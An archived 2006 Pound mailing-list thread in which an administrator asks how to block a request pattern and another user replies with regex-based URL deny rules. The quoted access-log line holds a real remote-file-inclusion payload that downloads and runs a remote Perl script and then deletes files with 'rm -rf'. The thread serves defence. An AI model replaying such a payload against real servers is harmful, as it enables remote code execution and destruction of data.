/ Zope / Apsis / Pound Mailing List / Archive / 2006 / 2006-01 / How to block based on GET pattern

[ << ] [ >> ]

[ Jeffrey Brown is out of the office. / Jeffrey ... ] [ another "bad header" / "Sergio ... ]

How to block based on GET pattern
Ivan Hernandez <ihernandez(at)cinemasoft.com.ar>		 2006-01-27 17:42:10 [ FULL ] 
i have received some attacks with patterns like this:

127.0.0.1 - - [27/Jan/2006:13:08:24 -0300] 
"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20*?

HTTP/1.0" 200 21310 "-" "Mozilla/5.0"

how can i block anything that says GLOBALS= ?
thanks 
ivan hernandez
p.d.: pound 1.8 on debian sarge
Re: How to block based on GET pattern
Adam Andrzej Jaworski <emaylx(at)gmail.com>		 2006-01-29 22:37:53 [ FULL ] 
Aloha!

>>>
>>> Ivan Hernandez <ihernandez(at)cinemasoft.com.ar> wrote:
>>> how can i block anything that says GLOBALS= ?
>>>

just use as first Service something like in this example (this is for 
Pound v2):

              # redirect all requests for forbidden urls part I
              Service
                  Url         
"\?.*(onload|\.php.+src|delete.+from|insert.+into|select.+from|GLOBALS\=).*"
                  Redirect    "http://google.com"
              End
              # redirect all requests for forbidden urls part II
              Service
                  Url         "\?.*(iframe|script|document\.cookie).*"
                  Redirect    "http://google.com"
              End

this way you can also create full-size URL filtering similar to 
mod_security

HTH,
Adam
MailBoxer